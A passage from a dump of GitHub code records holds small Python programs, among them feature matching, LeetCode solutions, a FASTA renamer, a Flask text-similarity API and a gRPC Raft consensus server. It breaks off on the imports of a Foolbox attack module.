Feature], float])\n\n\n@dataclasses.dataclass\nclass Match:\n a_index: int = -1\n b_index: int = -1\n # A lower score indicates a better match in all cases.\n match_score: float = np.Infinity\n\n def __lt__(self, other) -> bool:\n \"\"\"Comparison operator based on match score.\"\"\"\n return self.match_score < other.match_score\n\n\nclass ValidationStrategy(Enum):\n \"\"\"Validation strategy when matching features.\"\"\"\n\n CROSSCHECK = 1 # Features (i, j) are only a match, if the Score(i,j) is the lowest out of all scores for both i and j\n RATIO_TEST = (\n 2 # The ratio of the two best scores need to be larger than a threshold\n )\n\n\ndef match_brute_force(\n features_a: List[Feature],\n features_b: List[Feature],\n score_function: ScoreFunction,\n *,\n validation_strategies: ValidationStrategy | Set[ValidationStrategy] | None = None,\n ratio_test_threshold: float = 0.5\n) -> List[Match]:\n \"\"\"\n Matches two list features using a brute-force pairwise method.\n\n :param features_a: First list of features.\n :param features_b: Second list of features.\n :param score_function: A score function which returns the score of a particular match.\n :param validation_strategies: The validation strategies to use.\n :param ratio_test_threshold: The maximum ratio between the scores of the best and second best match if\n validation_strategy == RATIO_TEST. Matches not meeting this criterion will be set to Match().\n :return: List of matches for every feature in features_a, in the order of features_a.\n \"\"\"\n matches_for_a_features: List[List[Match]] = [[] for _ in range(len(features_a))]\n\n for a_index, feature_a in tqdm.tqdm(\n enumerate(features_a), \"Brute force feature matching\", total=len(features_a)\n ):\n for b_index, feature_b in enumerate(features_b):\n score = score_function(feature_a, feature_b)\n heapq.heappush(\n matches_for_a_features[a_index],\n Match(a_index=a_index, b_index=b_index, match_score=score),\n )\n\n if validation_strategies is None:\n validation_strategies = set()\n elif not isinstance(validation_strategies, set):\n validation_strategies = set([validation_strategies])\n\n if ValidationStrategy.RATIO_TEST in validation_strategies:\n matches_for_a_features = _filter_by_ratio_test(\n matches_for_a_features, ratio_test_threshold\n )\n if ValidationStrategy.CROSSCHECK in validation_strategies:\n matches_for_a_features = _filter_by_crosscheck(matches_for_a_features)\n\n matches = [matches_for_feature[0] for matches_for_feature in matches_for_a_features]\n\n return matches\n\n\ndef _filter_by_ratio_test(\n all_matches_for_all_features: List[List[Match]], ratio_test_threshold: float\n) -> List[List[Match]]:\n matches = []\n for all_matches_for_feature in all_matches_for_all_features:\n if len(all_matches_for_feature) > 1:\n if (\n all_matches_for_feature[0].match_score\n / all_matches_for_feature[1].match_score\n ) <= ratio_test_threshold:\n matches.append([all_matches_for_feature[0]])\n elif len(all_matches_for_feature) == 1:\n matches.append([all_matches_for_feature[0]])\n return matches\n\n\ndef _filter_by_crosscheck(\n all_matches_for_a_features: List[List[Match]],\n) -> List[List[Match]]:\n best_matches_for_b_features: Dict[int, Match] = {}\n for matches_for_a in all_matches_for_a_features:\n best_match_for_a = matches_for_a[0]\n if (\n best_match_for_a.b_index not in best_matches_for_b_features\n or best_matches_for_b_features[best_match_for_a.b_index].match_score\n > best_match_for_a.match_score\n ):\n best_matches_for_b_features[best_match_for_a.b_index] = best_match_for_a\n\n filtered_matches = [\n [matches_for_a[0]]\n for matches_for_a in all_matches_for_a_features\n if matches_for_a[0] == best_matches_for_b_features[matches_for_a[0].b_index]\n ]\n return filtered_matches\n","repo_name":"Bazs/structure_from_motion","sub_path":"lib/feature_matching/matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"32420074023","text":"# two float values\nval1 = 100.99\nval2 = 76.15\n# Adding the two given numbers\nsum = float(val1) + float(val2)\n\n# Displaying the addition result\nprint(\"The sum of given numbers is: \", sum)\n\n# two float values input by demand\n# Adding the two given numbers\nval1 = float(input(\"Primeiro valor: \"))\nval2 = float(input(\"Segundo valor: \"))\nsum = float(val1) + float(val2)\n\n# Displaying the addition result\nprint(\"A Soma é igual a: \", sum)\n","repo_name":"paepe/GitBegginers","sub_path":"HowToSumNumbers.py","file_name":"HowToSumNumbers.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19827939237","text":"\"\"\"\nApproach is really simple although looks complicated. Approach is that at every step, from all 4 directions,\nchoose the maximum value and put it into queue and mark as visited. Then dequeue it and again from all 4 directions, choose\nthe maximum value and put into queue and mark as visited. Keep repeating this until you reach the end.\nWhile selecting the maximum value neighbour for each cell, first check if that cell has already been visited or not\ni.e cell value != 'V'. If it has not been visited then only enter the if loop in line 38\n\"\"\"\n\nfrom collections import deque\nclass Solution(object):\n def maximumMinimumPath(self, A):\n \"\"\"\n :type A: List[List[int]]\n :rtype: int\n \"\"\"\n queue = deque()\n queue.append((0,0,A[0][0])) # Append 1st element at [0][0] to intialize the queue\n A[0][0] = 'V'\n global_min = float(\"inf\") # maitain a global minimum\n rows = len(A)\n cols = len(A[0])\n while queue:\n curr_i,curr_j,curr_val = queue.popleft() # Pop from queue\n if curr_i != rows-1 and curr_j != cols-1:\n neighbour_i,neighbour_j,neighbour_val = self.getMaxNeighbour(A,curr_i,curr_j,curr_val) # Get neighbour of current cell popped from queue\n global_min = min(global_min,neighbour_val) # If current cell has less value then global_min, then update global _min\n A[neighbour_i][neighbour_j] = 'V' # Mark as visited\n queue.append((neighbour_i,neighbour_j,neighbour_val)) # Append in queue\n else:\n return global_min\n\n def getMaxNeighbour(self,A,i,j,val):\n curr_max = (0,0,float(\"-inf\")) # Intialize curr max\n r = len(A)\n c = len(A[0])\n for k in [(i+1,j),(i-1,j),(i,j+1),(i,j-1)]: # check in all 4 directions\n if A[k[0]][k[1]] != 'V': # If the cell has not been visited already\n if A[k[0]][k[1]] > curr_max[2] and 0 <= k[0] <=r-1 and 0 <= k[1] <= c-1: # Check if the current cell is within boundary of grid and has not been already visited and its value is greater than curr_max\n curr_max = (k[0],k[1],A[k[0]][k[1]])\n return curr_max\n\n\ngrid = [[3,4,6,3,4],[0,2,1,1,7],[8,8,3,2,7],[3,2,4,9,8],[4,1,2,0,0],[4,6,5,4,3]]\ns = Solution()\nprint(s.maximumMinimumPath(grid))","repo_name":"anantvir/Leetcode-Problems","sub_path":"Array_Manipulations/Path_with_Minimum_Maximum_Value.py","file_name":"Path_with_Minimum_Maximum_Value.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"18223956893","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nRename fasta files based on a csv file with old and new names\n@ V.R.Marcelino\nCreated on Mon Mar 12 15:36:17 2018\n\"\"\"\n\nimport pandas as pd\nfrom argparse import ArgumentParser\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\n\n\nparser = ArgumentParser()\nparser.add_argument('-i', '--old_new_file', help='The path to the file containing old and new names', required=True)\nparser.add_argument('-f', '--fasta', help='The path to the fasta file', required=True)\nparser.add_argument('-o', '--output', help='The renamed file name', required=True)\n\n\nargs = parser.parse_args()\nrename_file = args.old_new_file\nfasta_fp = args.fasta\noutput_fp = args.output\n\n#rename_file = \"Rename_SRA_Runs.csv\"\n#fasta_fp = \"Mito.mapped.fasta\"\n#output_fp = \"Mito_mapped_renamed.fasta\"\n\n# store old and new names in a dict:\nrenames_df = pd.read_csv(rename_file,header=None,index_col=0)\nnames_dict = renames_df.to_dict('dict')[1]\n\n\n# new fasta file with renamed seqs:\nnew_fasta = []\nfor seq_record in SeqIO.parse(fasta_fp, \"fasta\"):\n old_id = seq_record.id\n if old_id in names_dict:\n new_id = names_dict[old_id] \n seq = str(seq_record.seq)\n new_record = SeqRecord(Seq(seq), id=new_id, description='')\n new_fasta.append(new_record)\n else:\n new_fasta.append(seq_record)\n\n\n# Save renamed seqs\ncount = SeqIO.write(new_fasta,output_fp, \"fasta\")\n\nprint (\"\")\nprint (\"Done. Saved %i sequences in the output file.\" % (count))\nprint (\"\")\n\n\n","repo_name":"vrmarcelino/utilities","sub_path":"rename_seqs.py","file_name":"rename_seqs.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6209069031","text":"from itertools import permutations\nfrom math import sqrt, factorial\n\nN = int(input())\n\nA = []\nfor i in range(N):\n x, y = map(int, input().split())\n A.append((x, y))\n\nans = 0\nfor X in permutations(A):\n tmp = 0\n for j in range(1, len(X)):\n x1, y1 = X[j - 1]\n x2, y2 = X[j]\n\n tmp += sqrt((x2 - x1)**2 + (y2 - y1)**2)\n ans += tmp\n\nprint(ans / factorial(N))\n","repo_name":"kotadd/competitive_programming","sub_path":"lib/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"74308988199","text":"import json\nimport pandas as pd\n\n\ndef json_df(data):\n \n # Complete the function\n #\n # You may create other functions if you wish,\n # but make sure this function accepts the JSON\n # string as input and returns a Pandas DataFrame\n \n d = {}\n \n \n k = \"\"\n v = \"\"\n for i in data:\n for j in i:\n k = i[j]\n v = j\n if k in d:\n l = d.get(k)\n l.append(v)\n d[k] = l\n else:\n d[k] = [v]\n \n \n \n df = pd.DataFrame(d)\n \n print(df)\n \n return df\n\n\n# DO NOT EDIT BELOW...\njson_df([\n {\"a1\": \"A\", \"b1\": \"B\", \"c1\": \"C\"},\n {\"a2\": \"A\", \"b2\": \"B\", \"c2\": \"C\"},\n {\"a3\": \"A\", \"b3\": \"B\", \"c3\": \"C\"},\n {\"a4\": \"A\", \"b4\": \"B\", \"c4\": \"C\"}\n])","repo_name":"dineshpazani/algorithms","sub_path":"src/com/python/pwc.py","file_name":"pwc.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34240141479","text":"# Normal If statement with List\n\nnumber = list(range(1, 11))\neven_number = []\nfor num in number:\n if num % 2 == 0:\n even_number.append(num)\n\nprint(even_number)\n\n\n# if statement with list comprehension\ndigit = [1,2,3,4,5,6,7,8,9,10]\neven_num = [num for num in digit if num % 2 == 0]\nprint(even_num)\n\nodd_num = [num for num in range(1,11) if num %2==1]\nprint(odd_num)\n","repo_name":"izharabbasi/Advance-python-learning","sub_path":"list_comprehen_with_if.py","file_name":"list_comprehen_with_if.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39314686692","text":"#서로소 평균 https://www.acmicpc.net/problem/21920\r\n#문제 접근\r\n#1. 서로소는 같은 소수가 1을 제외하고는 없음 > 일단 소수를 각각 구한다\r\n#2. gcd가 1이면 서로소이다.\r\n#추가 메모\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\nfrom math import gcd\r\n\r\nN = int(input())\r\na = input().split()\r\na = list(map(int,a))\r\nnum = int(input())\r\nsum = 0\r\nk = 0\r\nfor i in a:\r\n if gcd(i,num) == 1:\r\n sum += i\r\n k += 1\r\n\r\nprint(sum/k)\r\n","repo_name":"2023cote/2022cote_jeonghyun","sub_path":"11.19HW/21920.py","file_name":"21920.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27907768595","text":"import string\nfrom flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\ntest = [\n {'text': u'you POSTed something'}\n]\n\n\ndef jaccard_similarity(str1, str2):\n string1 = str1.translate(str.maketrans('', '', string.punctuation))\n string2 = str2.translate(str.maketrans('', '', string.punctuation))\n set_a = set(string1.split())\n set_b = set(string2.split())\n intersect = set_a.intersection(set_b)\n union = set_a.union(set_b)\n return float(len(intersect))/float(len(union))\n\n\n@app.route('/')\ndef index():\n return 'Hey, we have a Flask application inside a docker container!'\n\n\n@app.route('/text-sim/api/v1.0/compare', methods=['POST'])\ndef parse_request():\n data = request.json\n similarity = jaccard_similarity(data['text1'], data['text2'])\n return jsonify(similarity)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"bit-chemist/text-sim","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35882179274","text":"import numpy as np\nimport os\nimport tools as t\n\nthreshold = 0.5\n\ndef getRoadPixels(X, groundtruth):\n print(X.shape, groundtruth.shape)\n Y = np.where(groundtruth >= threshold)\n n = len(Y[0])\n dim_pixel = X.shape[-1]\n XX = np.zeros((n, dim_pixel))\n for i in range(n):\n XX[i] = X[Y[0][i], Y[1][i], Y[2][i]]\n return XX\n\ndef computeMeanPoint(X, groundtruth):\n road_pixels = getRoadPixels(X, groundtruth)\n return np.mean(road_pixels, axis=0)\n\ndef augmentImages(X, mean_point):\n XX = np.zeros(list(X.shape[:-1]) + [X.shape[-1] + 1])\n XX[:, :, :, :X.shape[-1]] = X\n XX[:, :, :, X.shape[-1]] = np.sqrt(np.sum(np.subtract(X, mean_point) ** 2, axis=-1))\n return XX\n","repo_name":"tdardinier/CIL","sub_path":"pixelwise/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21375224473","text":"#\n# @lc app=leetcode.cn id=221 lang=python3\n#\n# [221] 最大正方形\n#\nfrom typing import List\n\n\n# @lc code=start\nclass Solution:\n def maximalSquare(self, matrix: List[List[str]]) -> int:\n # dp(i,j)表示以i,j为右下角可能存在的最大正方形边长\n # if matrix[i,j] == 1:\n # dp(i,j) = dp(i-1,j) + 1 当dp(i-1,j) == dp(i,j-1)且matrix[i-dp(i-1,j), j-dp(i-1,j)] == 1\n # dp(i,j) = dp(i-1,j) 当dp(i-1,j) == dp(i,j-1)且matrix[i-dp(i-1,j), j-dp(i-1,j)] == 0\n # dp(i,j) = min(dp(i-1,j), dp(i,j-1)) + 1 其他情况\n height = len(matrix)\n width = len(matrix[0])\n dp = [[0] * width for _ in range(height)]\n for i in range(height):\n if matrix[i][0] == '1':\n dp[i][0] = 1\n for i in range(width):\n if matrix[0][i] == '1':\n dp[0][i] = 1\n for i in range(1, height):\n for j in range(1, width):\n if matrix[i][j] == '0':\n continue\n if dp[i-1][j] == dp[i][j-1]:\n if matrix[i-dp[i-1][j]][j-dp[i-1][j]] == '1':\n dp[i][j] = dp[i-1][j] + 1\n else:\n dp[i][j] = dp[i-1][j]\n else:\n dp[i][j] = min(dp[i-1][j], dp[i][j-1]) + 1\n tmp = [max(x) for x in dp]\n return max(tmp) ** 2\n\n# @lc code=end\n\n\nif __name__ == \"__main__\":\n Solution().maximalSquare([[\"1\", \"0\", \"1\", \"0\", \"0\"], [\"1\", \"0\", \"1\", \"1\", \"1\"], [\n \"1\", \"1\", \"1\", \"1\", \"1\"], [\"1\", \"0\", \"0\", \"1\", \"0\"]])\n","repo_name":"cuyu/leetcode","sub_path":"221.最大正方形.py","file_name":"221.最大正方形.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1743712239","text":"from enum import Enum\nimport sys\nimport random\nimport concurrent.futures\nimport threading\nimport time\nfrom typing import Dict, List, Optional\n\nimport grpc\n\nimport raft_pb2_grpc as pb2_grpc\nimport raft_pb2 as pb2\n\n\n[HEARTBEAT_DURATION, ELECTION_DURATION_FROM, ELECTION_DURATION_TO] = [x for x in [50, 150, 300]]\n\n\nclass ServerType(Enum):\n FOLLOWER = \"follower\"\n CANDIDATE = \"candidate\"\n LEADER = \"leader\"\n\n\nclass Node:\n def __init__(self, id: int, host: str, port: int, stub: Optional[pb2_grpc.RaftNodeStub]):\n self.id = id\n self.host = host\n self.port = port\n self.stub = stub\n\n # exclusively for the leader\n self.next_index = 0\n self.match_index = -1\n\n\n# Log entity\nclass Log:\n def __init__(self, index: int, term_number: int, command: str):\n self.index = index\n self.term_number = term_number\n self.command = command\n\n\n# Internal state of the leader\nclass State:\n def __init__(self, id: int, nodes: Dict[int, Node], debug: bool = False):\n self.id = id\n self.type: ServerType = ServerType.FOLLOWER\n self.term: int = 0\n self.leader_id: int = -1\n\n self.storage: Dict[str, str] = {}\n self.logs: List[Log] = []\n self.temp_logs: List[Log] = []\n\n self.commit_index: int = -1\n self.last_applied: int = -1\n\n self.is_suspended = False\n self.is_terminating = False\n self.state_lock = threading.Lock()\n self.election_timer_fired = threading.Event()\n self.heartbeat_events: Dict[int, threading.Event] = {}\n self.debug = debug\n\n self.election_campaign_timer: Optional[threading.Timer] = None\n self.election_timeout: float = -1\n self.nodes = nodes # dictionary id : Node\n self.vote_count: int = 0\n self.voted_for_id: int = -1\n\n\ndef get_last_log() -> Log:\n global STATE\n\n last_log = Log(-1, -1, \"\")\n if len(STATE.logs) > 0:\n last_log = STATE.logs[-1]\n return last_log\n\n\ndef exit_with_error(error_msg: str):\n print(f\"\\nERROR: {error_msg}\")\n sys.exit()\n\n\n# Election timer function\ndef select_election_timeout():\n global ELECTION_DURATION_FROM, ELECTION_DURATION_TO\n\n return random.randrange(ELECTION_DURATION_FROM, ELECTION_DURATION_TO) * 0.001\n\n\ndef reset_election_campaign_timer():\n global STATE\n\n stop_election_campaign_timer()\n STATE.election_campaign_timer = threading.Timer(STATE.election_timeout, STATE.election_timer_fired.set)\n STATE.election_campaign_timer.start()\n\n\ndef select_new_election_timeout_duration():\n global STATE\n\n STATE.election_timeout = select_election_timeout()\n\n\ndef stop_election_campaign_timer():\n global STATE\n\n if STATE.election_campaign_timer:\n STATE.election_campaign_timer.cancel()\n\n\n# Elections\ndef start_election():\n global STATE\n\n with STATE.state_lock:\n if STATE.is_terminating:\n return\n\n print(\"The leader is dead\")\n STATE.type = ServerType.CANDIDATE\n STATE.leader_id = -1\n STATE.term += 1\n\n # vote for ourselves\n STATE.vote_count = 1\n STATE.voted_for_id = STATE.id\n\n print(f\"I am a candidate. Term: {STATE.term}\")\n for id in STATE.nodes.keys():\n if id != STATE.id:\n t = threading.Thread(target=request_vote_worker_thread, args=(id,))\n t.start()\n\n # now RequestVote threads have started,\n # lets set a timer for the end of the election\n reset_election_campaign_timer()\n\n\ndef has_enough_votes():\n global STATE\n\n required_votes = (len(STATE.nodes) // 2) + 1\n return STATE.vote_count >= required_votes\n\n\ndef finalize_election():\n global STATE\n\n stop_election_campaign_timer()\n with STATE.state_lock:\n if STATE.type != ServerType.CANDIDATE:\n return\n\n if has_enough_votes():\n\n # Become a leader\n STATE.type = ServerType.LEADER\n STATE.leader_id = STATE.id\n STATE.vote_count = 0\n STATE.voted_for_id = -1\n\n start_heartbeats()\n print(\"Votes received\")\n display_type_term_info()\n return\n\n \"\"\"If election was unsuccessful\n then pick new timeout duration\"\"\"\n become_a_follower()\n select_new_election_timeout_duration()\n reset_election_campaign_timer()\n\n\ndef become_a_follower():\n global STATE\n\n if STATE.type != ServerType.FOLLOWER:\n STATE.type = ServerType.FOLLOWER\n display_type_term_info()\n STATE.voted_for_id = -1\n STATE.vote_count = 0\n\n\n# Heartbeats\ndef start_heartbeats():\n global STATE\n\n for event in STATE.heartbeat_events.values():\n event.set()\n\n\n# Thread functions\ndef request_vote_worker_thread(id_to_request):\n global STATE\n\n ensure_connected(id_to_request)\n node = STATE.nodes[id_to_request]\n\n saved_current_term = STATE.term\n\n try:\n if not node.stub:\n return\n\n with STATE.state_lock:\n saved_last_log = get_last_log()\n\n response = node.stub.RequestVote(\n pb2.VoteArgs(\n term=saved_current_term,\n candidate_id=STATE.id,\n last_log_index=saved_last_log.index,\n last_log_term=saved_last_log.term_number,\n ),\n timeout=0.1,\n )\n\n if not response.result:\n reset_election_campaign_timer()\n\n with STATE.state_lock:\n if STATE.type != ServerType.CANDIDATE or STATE.is_suspended:\n return\n\n if saved_current_term < response.term:\n STATE.term = response.term\n become_a_follower()\n return\n elif saved_current_term == response.term:\n STATE.vote_count += 1\n\n # got enough votes, no need to wait for the end of the timeout\n if has_enough_votes():\n finalize_election()\n\n except grpc.RpcError:\n return\n\n\ndef election_timeout_thread():\n global STATE\n\n while not STATE.is_terminating:\n if STATE.election_timer_fired.wait(timeout=0.5):\n\n STATE.election_timer_fired.clear()\n if STATE.is_suspended:\n continue\n\n # election timer just fired\n if STATE.type == ServerType.FOLLOWER:\n # node didn't receive any heartbeats on time\n # that's why it should become a candidate\n\n start_election()\n elif STATE.type == ServerType.CANDIDATE:\n # okay, election is over\n # we need to count votes\n finalize_election()\n # if somehow we got here while being a leader,\n # then do nothing\n\n\ndef update_commit_index():\n global STATE\n\n total_nodes = len(STATE.nodes)\n\n \"\"\"\n find the maximum index of the log,\n which is committed to more than a half of followers\n \"\"\"\n for i in range(STATE.commit_index + 1, len(STATE.logs)):\n log = STATE.logs[i]\n if log.term_number == STATE.term:\n match_count = 1\n for node in STATE.nodes.values():\n if node.id == STATE.id:\n continue\n if node.match_index >= i:\n match_count += 1\n if match_count * 2 > total_nodes:\n with STATE.state_lock:\n STATE.commit_index = i\n\n with STATE.state_lock:\n if STATE.commit_index > STATE.last_applied:\n for l in STATE.logs[STATE.last_applied + 1 : STATE.commit_index + 1]:\n # apply committed changes to the storage\n add_to_storage(l.command)\n STATE.last_applied = STATE.commit_index\n\n\ndef heartbeat_thread(id_to_request):\n global STATE\n\n while not STATE.is_terminating:\n try:\n if STATE.heartbeat_events[id_to_request].wait(timeout=0.150):\n STATE.heartbeat_events[id_to_request].clear()\n\n if (STATE.type != ServerType.LEADER) or STATE.is_suspended:\n continue\n\n ensure_connected(id_to_request)\n node = STATE.nodes[id_to_request]\n if not node.stub:\n return\n\n with STATE.state_lock:\n current_term = STATE.term\n current_commit_index = STATE.commit_index\n current_logs = STATE.logs\n\n prev_log_index = node.next_index - 1\n prev_log_term = -1\n if prev_log_index >= 0:\n prev_log_term = current_logs[prev_log_index].term_number\n\n entries = list(map(lambda x: pb2.HeartbeatArgs.Entry(**x.__dict__), current_logs[node.next_index :]))\n\n payload = pb2.HeartbeatArgs(\n term=current_term,\n leader_id=STATE.id,\n prev_log_index=prev_log_index,\n prev_log_term=prev_log_term,\n entries=entries,\n leader_commit=current_commit_index,\n )\n\n response = node.stub.AppendEntries(\n payload,\n timeout=0.050,\n )\n\n threading.Timer(HEARTBEAT_DURATION * 0.001, STATE.heartbeat_events[id_to_request].set).start()\n\n if (STATE.type != ServerType.LEADER) or STATE.is_suspended:\n continue\n\n with STATE.state_lock:\n if STATE.term < response.term:\n reset_election_campaign_timer()\n STATE.term = response.term\n become_a_follower()\n\n if response.result:\n node.next_index += len(entries)\n node.match_index = node.next_index - 1\n\n update_commit_index()\n else:\n node.next_index = max(0, node.next_index - 1)\n\n elif STATE.type == ServerType.LEADER:\n STATE.heartbeat_events[id_to_request].set()\n\n except grpc.RpcError:\n # Create new channel if something went wrong\n create_stub(id_to_request)\n continue\n\n\n# storage functions\ndef add_to_storage(command: str):\n key, value = parse_command(command)\n STATE.storage[key] = value\n\n\n# helpers that sets timers running again\n# when suspend has ended\ndef wake_up_after_suspend():\n global STATE\n\n print(\"Server is wake up now!\")\n STATE.is_suspended = False\n if STATE.type == ServerType.LEADER:\n start_heartbeats()\n else:\n reset_election_campaign_timer()\n\n\n# gRPC server handler\nclass Handler(pb2_grpc.RaftNodeServicer):\n def RequestVote(self, request, context):\n global STATE\n\n if STATE.is_suspended:\n return\n\n reset_election_campaign_timer()\n with STATE.state_lock:\n response = {\"result\": False, \"term\": STATE.term}\n if STATE.term < request.term:\n STATE.term = request.term\n become_a_follower()\n\n last_log = get_last_log()\n if (\n (STATE.term == request.term)\n and (STATE.voted_for_id == -1)\n and (request.last_log_index >= last_log.index)\n and not (last_log.index != -1 and request.last_log_term != last_log.term_number)\n ):\n response = {\"result\": True, \"term\": STATE.term}\n STATE.voted_for_id = request.candidate_id\n print(f\"Voted for node {STATE.voted_for_id}\")\n return pb2.ResultWithTerm(**response)\n\n def AppendEntries(self, request, context):\n global STATE\n\n if STATE.is_suspended:\n return\n\n reset_election_campaign_timer()\n\n with STATE.state_lock:\n response = {\"result\": False, \"term\": STATE.term}\n if STATE.term < request.term:\n STATE.term = request.term\n become_a_follower()\n\n if STATE.term == request.term:\n STATE.leader_id = request.leader_id\n if STATE.type != ServerType.FOLLOWER:\n become_a_follower()\n\n last_log = get_last_log()\n if request.prev_log_index == -1 or (\n request.prev_log_index < len(STATE.logs) and request.prev_log_term == last_log.term_number\n ):\n response = {\"result\": True, \"term\": STATE.term}\n log_insert_index = request.prev_log_index + 1\n new_entries_index = 0\n\n while True:\n if log_insert_index >= len(STATE.logs) or new_entries_index >= len(request.entries):\n break\n if STATE.logs[log_insert_index].term_number != request.entries[new_entries_index].term_number:\n break\n log_insert_index += 1\n new_entries_index += 1\n\n if new_entries_index < len(request.entries):\n STATE.logs[log_insert_index:] = list(\n map(\n lambda entry: Log(entry.index, entry.term_number, entry.command),\n request.entries[new_entries_index:],\n )\n )\n\n for log in STATE.logs[log_insert_index:]:\n add_to_storage(log.command)\n\n if request.leader_commit > STATE.commit_index:\n STATE.commit_index = min(request.leader_commit, len(STATE.logs) - 1)\n\n return pb2.ResultWithTerm(**response)\n\n def GetLeader(self, request, context):\n global STATE\n\n if STATE.is_suspended:\n return\n\n leader_node = STATE.nodes[STATE.leader_id]\n response = {\"leader_id\": STATE.leader_id, \"leader_addr\": f\"{leader_node.host}:{leader_node.port}\"}\n return pb2.LeaderResp(**response)\n\n def Suspend(self, request, context):\n global STATE\n\n if STATE.is_suspended:\n return\n\n STATE.is_suspended = True\n print(\"Server is sleeping...\")\n threading.Timer(request.duration, wake_up_after_suspend).start()\n return pb2.Empty()\n\n def GetVal(self, request, context):\n global STATE\n\n if STATE.is_suspended:\n return\n\n value = STATE.storage.get(request.key, None)\n return pb2.ResultWithVal(**{\"result\": value != None, \"value\": value or \"\"})\n\n def SetVal(self, request, context):\n global STATE\n\n if STATE.is_suspended:\n return\n\n if STATE.type == ServerType.LEADER:\n with STATE.state_lock:\n last_log = get_last_log()\n current_last_log_index = last_log.index + 1\n STATE.logs.append(Log(current_last_log_index, STATE.term, f\"{request.key} {request.value}\"))\n\n return pb2.Result(**{\"result\": True})\n\n if STATE.type == ServerType.CANDIDATE or STATE.leader_id == -1:\n return pb2.Result(**{\"result\": False})\n\n leader_node = STATE.nodes[STATE.leader_id]\n\n try:\n ensure_connected(STATE.leader_id)\n if not leader_node.stub:\n raise grpc.RpcError()\n\n response = leader_node.stub.SetVal(request, timeout=2)\n\n except grpc.RpcError:\n return pb2.Result(**{\"result\": False})\n\n return pb2.Result(**{\"result\": response.result})\n\n\ndef create_stub(id):\n node = STATE.nodes[id]\n channel = grpc.insecure_channel(f\"{node.host}:{node.port}\")\n node.stub = pb2_grpc.RaftNodeStub(channel)\n\n\ndef ensure_connected(id):\n global STATE\n\n if id == STATE.id:\n raise BaseException(\"Shouldn't try to connect to itself\")\n\n node = STATE.nodes[id]\n if not node.stub:\n create_stub(id)\n\n\ndef start_server():\n global STATE\n\n self_node = STATE.nodes[STATE.id]\n server = grpc.server(concurrent.futures.ThreadPoolExecutor(max_workers=10))\n pb2_grpc.add_RaftNodeServicer_to_server(Handler(), server)\n server.add_insecure_port(f\"{self_node.host}:{self_node.port}\")\n server.start()\n return server\n\n\ndef get_cmd_args():\n try:\n id = int(sys.argv[1])\n except:\n exit_with_error(\"Expected one cmd argument: \")\n return id\n\n\ndef read_nodes(config_path: str) -> Dict[int, Node]:\n nodes = {}\n with open(config_path, \"r\") as f:\n parts = list(map(lambda line: line.split(), f.readlines()))\n\n for part in parts:\n nodes[int(part[0])] = Node(int(part[0]), part[1], int(part[2]), None)\n\n return nodes\n\n\ndef display_type_term_info():\n global STATE\n\n print(f\"I am a {STATE.type.value}. Term: {STATE.term}\")\n\n\ndef parse_command(command: str):\n parts = command.strip().split()\n return parts[0], \" \".join(parts[1:])\n\n\nif __name__ == \"__main__\":\n\n id = get_cmd_args()\n nodes = read_nodes(\"config.conf\")\n STATE = State(id, nodes, True)\n\n heartbeat_events: Dict[int, threading.Event] = {}\n\n election_thread = threading.Thread(target=election_timeout_thread)\n election_thread.start()\n\n for node in STATE.nodes.values():\n if STATE.id != node.id:\n heartbeat_events[node.id] = threading.Event()\n\n STATE.heartbeat_events = heartbeat_events\n\n heartbeat_threads = []\n for node in STATE.nodes.values():\n if STATE.id != node.id:\n t = threading.Thread(target=heartbeat_thread, args=(node.id,))\n t.start()\n heartbeat_threads.append(t)\n\n server = start_server()\n\n self_node = STATE.nodes[STATE.id]\n print(f\"The server starts at {self_node.host}:{self_node.port}\")\n\n display_type_term_info()\n select_new_election_timeout_duration()\n reset_election_campaign_timer()\n\n try:\n server.wait_for_termination()\n except KeyboardInterrupt:\n with STATE.state_lock:\n STATE.is_terminating = True\n\n server.stop(0)\n print(\"\\nShutting down\")\n\n # Close threads\n election_thread.join()\n [t.join() for t in heartbeat_threads]\n","repo_name":"Kadaverciant/Distributed-and-Network-Programming","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":18213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72824328680","text":"import logging\nfrom typing import Union, Any, Optional, Callable, List\nfrom typing_extensions import Literal\n\nimport math\n\nimport eagerpy as ep\nimport numpy as np\n\nfrom foolbox.attacks import LinearSearchBlendedUniformNoiseAttack\nfrom foolbox.tensorboard import TensorBoard\nfrom ..models import Model\n\nfrom ..criteria import Criterion\n\nfrom ..distances import l1\n\nfrom ..devutils import atleast_kd, 